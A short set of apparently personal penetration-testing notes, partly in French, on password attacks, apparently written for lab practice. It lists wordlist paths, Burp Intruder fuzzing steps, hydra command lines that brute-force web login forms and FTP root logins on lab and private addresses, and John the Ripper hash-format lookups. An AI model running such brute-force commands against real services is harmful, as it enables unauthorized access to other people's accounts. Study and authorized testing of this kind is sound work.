GitHub - Mebus/cupp: Common User Passwords Profiler (CUPP)
/usr/share/wordlists/ # dirb / metasploit/ rockyou / wfuzz
/usr/share/seclists/ #apt install seclist
#select page>attack>FUZZ...
# send to "Intruder" => attack
brute force de password de services web: ftp / ssh / formulaires web
hydra -l admin -P /usr/share/wordlists/rockyou.txt www.onlineshop.thm http-post-form "/login.php:username=^USER^&password=^PASS^:F=incorrect" -V
#bien passer tous les paramètres du formulaire ex:
hydra -L usernames -P passwords 192.208.137.3 http-post-form "/login.php:login=^USER^&password=^PASS^&security_level=0&form=submit:Invalid credentials or user not activated!"
hydra -l root -P passwords.txt [-t 32] 192.168.1.1 ftp # -t parallel tasks (default 16)
sur fichier local (hash)
john --list=formats
john --list=formats | grep -i md5 # exemple md5